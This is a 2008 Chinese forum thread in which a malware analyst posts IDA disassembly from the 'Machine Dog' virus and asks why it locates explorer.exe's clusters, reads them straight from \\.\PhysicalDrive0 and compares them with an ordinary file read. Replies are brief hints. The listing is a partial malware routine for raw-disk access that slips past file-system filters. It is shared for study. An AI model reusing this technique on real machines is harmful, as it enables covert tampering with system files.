首页
社区
课程
招聘
[旧帖] [求助]关于机器狗病毒代码的目的 0.00雪花
发表于: 2008-9-10 16:53 6014

[旧帖] [求助]关于机器狗病毒代码的目的 0.00雪花

2008-9-10 16:53
6014
最近分析机器狗病毒,对其中一处病毒的代码不清楚是什么作用,请高手指点。
这个段代码主要是关于explorer.exe的操作,病毒先从找到物理硬盘上explorer.exe的位置,然后直接从物理硬盘上读取explorer.exe的前512bytes,然后再调用CreateFile,ReadFile读入explorer.exe的512bytes,比较这两种方法得到的数据有什么不同,请高手指点一下这样做的目的,是想检测某种监测技术么????
代码如下

:00401826                 push    ebp
.text:00401827                 mov     ebp, esp
.text:00401829                 add     esp, 0FFFFFE80h
.text:0040182F                 push    esi
.text:00401830                 push    edi
.text:00401831                 push    ebx
.text:00401832                 xor     ebx, ebx
.text:00401834                 push    0               ; hTemplateFile
.text:00401836                 push    20000000h       ; dwFlagsAndAttributes
.text:0040183B                 push    3               ; dwCreationDisposition
.text:0040183D                 push    0               ; lpSecurityAttributes
.text:0040183F                 push    3               ; dwShareMode
.text:00401841                 push    80000000h       ; dwDesiredAccess
.text:00401846                 push    [ebp+lpFileName] ; lpFileName
.text:00401849                 call    CreateFileA
.text:0040184E                 cmp     eax, 0FFFFFFFFh
.text:00401851                 jnz     short loc_40185C
.text:00401853                 xor     eax, eax
.text:00401855                 pop     ebx
.text:00401856                 pop     edi
.text:00401857                 pop     esi
.text:00401858                 leave
.text:00401859                 retn    4
.text:0040185C ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:0040185C
.text:0040185C loc_40185C:                             ; CODE XREF: modify_exeplore+2Bj
.text:0040185C                 mov     esi, eax
.text:0040185E                 mov     [ebp+hObject], esi
.text:00401864                 lea     eax, [ebp+NumberOfBytesWritten]
.text:0040186A                 push    eax             ; lpFileSizeHigh
.text:0040186B                 push    esi             ; hFile
.text:0040186C                 call    GetFileSize
.text:00401871                 mov     [ebp+NumberOfBytesWritten], eax
.text:00401877                 jmp     loc_4018FD
.text:00401877 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:0040187C ; .text:0040187C
.text:004018FD ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:004018FD
.text:004018FD loc_4018FD:                             ; CODE XREF: modify_exeplore+51j
.text:004018FD                 push    512             ; dwBytes
.text:00401902                 push    40h             ; uFlags
.text:00401904                 call    GlobalAlloc
.text:00401909                 or      eax, eax
.text:0040190B                 jnz     short loc_401916
.text:0040190D                 xor     eax, eax
.text:0040190F                 pop     ebx
.text:00401910                 pop     edi
.text:00401911                 pop     esi
.text:00401912                 leave
.text:00401913                 retn    4
.text:00401916 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401916
.text:00401916 loc_401916:                             ; CODE XREF: modify_exeplore+E5j
.text:00401916                 mov     [ebp+lpBuffer], eax
.text:0040191C                 push    8
.text:0040191E                 lea     eax, [ebp+InBuffer]
.text:00401921                 push    eax
.text:00401922                 call    RtlZeroMemory
.text:00401927                 push    110h
.text:0040192C                 lea     eax, [ebp+OutBuffer]
.text:00401932                 push    eax
.text:00401933                 call    RtlZeroMemory
.text:00401938                 push    0               ; lpOverlapped
.text:0040193A                 lea     eax, [ebp+NumberOfBytesRead]
.text:00401940                 push    eax             ; lpBytesReturned
.text:00401941                 push    110h            ; nOutBufferSize
.text:00401946                 lea     eax, [ebp+OutBuffer]
.text:0040194C                 push    eax             ; lpOutBuffer
.text:0040194D                 push    8               ; nInBufferSize
.text:0040194F                 lea     eax, [ebp+InBuffer]
.text:00401952                 push    eax             ; lpInBuffer
.text:00401953                 push    FSCTL_GET_RETRIEVAL_POINTERS ; dwIoControlCode
.text:00401958                 push    esi             ; hDevice
.text:00401959                 call    DeviceIoControl
.text:0040195E                 lea     eax, [ebp+OutBuffer]
.text:00401964                 mov     edi, [eax]
.text:00401966                 mov     edx, [eax+RETRIEVAL_POINTERS_BUFFER.Extents.Lcn.u.HighPart]
.text:00401969                 mov     [ebp+lDistanceToMove], edx
.text:0040196F                 mov     ecx, [eax+RETRIEVAL_POINTERS_BUFFER.Extents.Lcn.u.LowPart]
.text:00401972                 mov     [ebp+DistanceToMoveHigh], ecx
.text:00401978                 or      edi, edi
.text:0040197A                 jz      short loc_401981
.text:0040197C                 cmp     ecx, 0FFFFFFFFh
.text:0040197F                 jnz     short loc_40198A
.text:00401981
.text:00401981 loc_401981:                             ; CODE XREF: modify_exeplore+154j
.text:00401981                 xor     eax, eax
.text:00401983                 pop     ebx
.text:00401984                 pop     edi
.text:00401985                 pop     esi
.text:00401986                 leave
.text:00401987                 retn    4
.text:0040198A ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:0040198A
.text:0040198A loc_40198A:                             ; CODE XREF: modify_exeplore+159j
.text:0040198A                 mov     dword ptr [ebp+FileName], '\.\\'
.text:00401994                 mov     [ebp+var_17C], 'syhP'
.text:0040199E                 jmp     loc_401A24
.text:0040199E ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:004019A3 ; .text:004019A3
.text:00401A24 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401A24
.text:00401A24 loc_401A24:                             ; CODE XREF: modify_exeplore+178j
.text:00401A24                 mov     [ebp+var_178], 'laci'
.text:00401A2E                 mov     [ebp+var_174], 'virD'
.text:00401A38                 mov     [ebp+var_170], '0e'
.text:00401A42                 lea     eax, [ebp+FileName]
.text:00401A48                 push    0               ; hTemplateFile
.text:00401A4A                 push    0               ; dwFlagsAndAttributes
.text:00401A4C                 push    3               ; dwCreationDisposition
.text:00401A4E                 push    0               ; lpSecurityAttributes
.text:00401A50                 push    3               ; dwShareMode
.text:00401A52                 push    0C0000000h      ; dwDesiredAccess
.text:00401A57                 push    eax             ; lpFileName
.text:00401A58                 call    CreateFileA
.text:00401A5D                 cmp     eax, 0FFFFFFFFh
.text:00401A60                 jnz     short loc_401A6B
.text:00401A62                 xor     eax, eax
.text:00401A64                 pop     ebx
.text:00401A65                 pop     edi
.text:00401A66                 pop     esi
.text:00401A67                 leave
.text:00401A68                 retn    4
.text:00401A6B ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401A6B
.text:00401A6B loc_401A6B:                             ; CODE XREF: modify_exeplore+23Aj
.text:00401A6B                 mov     [ebp+hFile], eax
.text:00401A71                 push    0               ; dwMoveMethod
.text:00401A73                 push    0               ; lpDistanceToMoveHigh
.text:00401A75                 push    0               ; lDistanceToMove
.text:00401A77                 push    [ebp+hFile]     ; hFile
.text:00401A7D                 call    SetFilePointer
.text:00401A82                 push    0               ; lpOverlapped
.text:00401A84                 lea     eax, [ebp+NumberOfBytesRead]
.text:00401A8A                 push    eax             ; lpNumberOfBytesRead
.text:00401A8B                 push    200h            ; nNumberOfBytesToRead
.text:00401A90                 push    [ebp+lpBuffer]  ; lpBuffer
.text:00401A96                 push    [ebp+hFile]     ; hFile
.text:00401A9C                 call    ReadFile
.text:00401AA1                 mov     eax, [ebp+lpBuffer]
.text:00401AA7                 mov     cl, [eax+1C2h]  ; Partition type
.text:00401AAD                 mov     [ebp+Partition_type], cl
.text:00401AB3                 cmp     cl, 0Bh         ; FAT32
.text:00401AB6                 jz      short loc_401ACB ; Logical block address of the first sector in the partition
.text:00401AB8                 cmp     cl, 0Ch         ; FAT32
.text:00401ABB                 jz      short loc_401ACB ; Logical block address of the first sector in the partition
.text:00401ABD                 cmp     cl, 7           ; NTFS
.text:00401AC0                 jz      short loc_401ACB ; Logical block address of the first sector in the partition
.text:00401AC2                 xor     eax, eax
.text:00401AC4                 pop     ebx
.text:00401AC5                 pop     edi
.text:00401AC6                 pop     esi
.text:00401AC7                 leave
.text:00401AC8                 retn    4
.text:00401ACB ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401ACB
.text:00401ACB loc_401ACB:                             ; CODE XREF: modify_exeplore+290j
.text:00401ACB                                         ; modify_exeplore+295j
.text:00401ACB                                         ; modify_exeplore+29Aj
.text:00401ACB                 mov     ebx, [eax+1C6h] ; Logical block address of the first sector in the partition
.text:00401AD1                 mov     edx, 200h
.text:00401AD6                 imul    edx, ebx        ; edx = 7e00
.text:00401AD9                 push    edx
.text:00401ADA                 push    0               ; dwMoveMethod
.text:00401ADC                 push    0               ; lpDistanceToMoveHigh
.text:00401ADE                 push    edx             ; lDistanceToMove
.text:00401ADF                 push    [ebp+hFile]     ; hFile
.text:00401AE5                 call    SetFilePointer
.text:00401AEA                 push    0               ; lpOverlapped
.text:00401AEC                 lea     eax, [ebp+NumberOfBytesRead]
.text:00401AF2                 push    eax             ; lpNumberOfBytesRead
.text:00401AF3                 push    512             ; nNumberOfBytesToRead
.text:00401AF8                 push    [ebp+lpBuffer]  ; lpBuffer
.text:00401AFE                 push    [ebp+hFile]     ; hFile
.text:00401B04                 call    ReadFile
.text:00401B09                 mov     eax, [ebp+lpBuffer]
.text:00401B0F                 xor     edx, edx
.text:00401B11                 mov     cl, [ebp+Partition_type]
.text:00401B17                 cmp     cl, 0Bh
.text:00401B1A                 jz      short loc_401B21
.text:00401B1C                 cmp     cl, 0Ch
.text:00401B1F                 jnz     short loc_401B2A
.text:00401B21
.text:00401B21 loc_401B21:                             ; CODE XREF: modify_exeplore+2F4j
.text:00401B21                 mov     dl, [eax+10h]
.text:00401B24                 mov     ecx, [eax+24h]
.text:00401B27                 imul    edx, ecx
.text:00401B2A
.text:00401B2A loc_401B2A:                             ; CODE XREF: modify_exeplore+2F9j
.text:00401B2A                 xor     ecx, ecx
.text:00401B2C                 xor     ebx, ebx
.text:00401B2E                 mov     cx, [eax+0Bh]   ; Sector Size
.text:00401B32                 mov     bl, [eax+0Dh]   ; Sectors per Cluster
.text:00401B35                 imul    ecx, ebx
.text:00401B38                 xor     eax, eax
.text:00401B3A                 mov     eax, [ebp+DistanceToMoveHigh]
.text:00401B40                 jmp     loc_401BC6
.text:00401B40 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401B45 ; .text:00401B45
.text:00401BC6 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401BC6
.text:00401BC6 loc_401BC6:                             ; CODE XREF: modify_exeplore+31Aj
.text:00401BC6                 or      eax, eax
.text:00401BC8                 jnz     short loc_401BE0
.text:00401BCA                 mov     eax, [ebp+lDistanceToMove]
.text:00401BD0                 mul     ecx
.text:00401BD2                 mov     [ebp+lDistanceToMove], eax
.text:00401BD8                 mov     [ebp+DistanceToMoveHigh], edx
.text:00401BDE                 jmp     short loc_401BFC
.text:00401BE0 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401BE0
.text:00401BE0 loc_401BE0:                             ; CODE XREF: modify_exeplore+3A2j
.text:00401BE0                 mov     eax, [ebp+lDistanceToMove]
.text:00401BE6                 mul     ecx
.text:00401BE8                 mov     [ebp+lDistanceToMove], eax
.text:00401BEE                 mov     ebx, [ebp+DistanceToMoveHigh]
.text:00401BF4                 add     ebx, edx
.text:00401BF6                 mov     [ebp+DistanceToMoveHigh], ebx
.text:00401BFC
.text:00401BFC loc_401BFC:                             ; CODE XREF: modify_exeplore+3B8j
.text:00401BFC                 mov     [ebp+size_per_cluster], ecx
.text:00401C02                 pop     edx
.text:00401C03                 mov     eax, [ebp+lDistanceToMove]
.text:00401C09                 add     edx, eax
.text:00401C0B                 mov     [ebp+lDistanceToMove], edx
.text:00401C11                 mov     eax, [ebp+NumberOfBytesWritten]
.text:00401C17                 mov     ecx, [ebp+size_per_cluster]
.text:00401C1D                 xor     edx, edx
.text:00401C1F                 div     ecx
.text:00401C21                 mov     ecx, [ebp+size_per_cluster]
.text:00401C27                 mul     ecx
.text:00401C29                 mov     [ebp+nNumberOfBytesToWrite], eax
.text:00401C2F                 push    eax             ; dwBytes
.text:00401C30                 push    40h             ; uFlags
.text:00401C32                 call    GlobalAlloc
.text:00401C37                 or      eax, eax
.text:00401C39                 jnz     short loc_401C44
.text:00401C3B                 xor     eax, eax
.text:00401C3D                 pop     ebx
.text:00401C3E                 pop     edi
.text:00401C3F                 pop     esi
.text:00401C40                 leave
.text:00401C41                 retn    4
.text:00401C44 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401C44
.text:00401C44 loc_401C44:                             ; CODE XREF: modify_exeplore+413j
.text:00401C44                 mov     [ebp+alloc], eax
.text:00401C4A                 push    0               ; lpOverlapped
.text:00401C4C                 lea     eax, [ebp+NumberOfBytesWritten]
.text:00401C52                 push    eax             ; lpNumberOfBytesRead
.text:00401C53                 push    [ebp+NumberOfBytesWritten] ; nNumberOfBytesToRead
.text:00401C59                 push    [ebp+alloc]     ; lpBuffer
.text:00401C5F                 push    [ebp+hObject]   ; hFile
.text:00401C65                 call    ReadFile
.text:00401C6A                 push    0               ; dwMoveMethod
.text:00401C6C                 lea     eax, [ebp+DistanceToMoveHigh]
.text:00401C72                 push    eax             ; lpDistanceToMoveHigh
.text:00401C73                 push    [ebp+lDistanceToMove] ; lDistanceToMove
.text:00401C79                 push    [ebp+hFile]     ; hFile
.text:00401C7F                 call    SetFilePointer
.text:00401C84                 jmp     loc_401D0A
.text:00401C84 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401C89 ; .text:00401C89
.text:00401D0A ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00401D0A
.text:00401D0A loc_401D0A:                             ; CODE XREF: modify_exeplore+45Ej
.text:00401D0A                 push    200h
.text:00401D0F                 push    [ebp+lpBuffer]
.text:00401D15                 call    RtlZeroMemory
.text:00401D1A                 push    0               ; lpOverlapped
.text:00401D1C                 lea     eax, [ebp+NumberOfBytesRead]
.text:00401D22                 push    eax             ; lpNumberOfBytesRead
.text:00401D23                 push    200h            ; nNumberOfBytesToRead
.text:00401D28                 push    [ebp+lpBuffer]  ; lpBuffer
.text:00401D2E                 push    [ebp+hFile]     ; hFile
.text:00401D34                 call    ReadFile
.text:00401D39                 push    [ebp+hObject]   ; hObject
.text:00401D3F                 call    CloseHandle
.text:00401D44                 mov     esi, [ebp+alloc]
.text:00401D4A                 mov     edi, [ebp+lpBuffer]
.text:00401D50                 mov     ecx, 200h
.text:00401D55                 cmpsd
.text:00401D56                 jz      short loc_401D61
.text:00401D58                 xor     eax, eax
.text:00401D5A                 pop     ebx
.text:00401D5B                 pop     edi
.text:00401D5C                 pop     esi
.text:00401D5D                 leave
.text:00401D5E                 retn    4

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (9)
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
你真有时间                      太多了                下次来看
2008-9-10 23:24
0
雪    币: 6082
活跃值: (819)
能力值: ( LV4,RANK:45 )
在线值:
发帖
回帖
粉丝
3
你是坏人..
2008-9-11 00:28
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
4
楼主想什么呢
2008-9-11 00:38
0
雪    币: 113
活跃值: (28)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
楼主连机器狗的目标是什么都不知道吗?
2008-9-11 11:01
0
雪    币: 1355
活跃值: (344)
能力值: ( LV13,RANK:920 )
在线值:
发帖
回帖
粉丝
6
咋知道的?为什么是坏人?
2008-9-11 12:08
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
我只是想知道这段代码的目的是什么,不是坏人啊,冤枉
2008-9-12 15:43
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
请高手帮忙解答一下啊
2008-9-12 15:44
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
你不要告诉我是熊猫二代吧?

   呵呵~!
2008-9-12 17:41
0
雪    币: 113
活跃值: (28)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
机器狗的特色是什么?
为什么要有这种特色?
明白这些你就明白代码的目的了
2008-9-15 13:38
0
游客
登录 | 注册 方可回帖
返回
// // 统计代码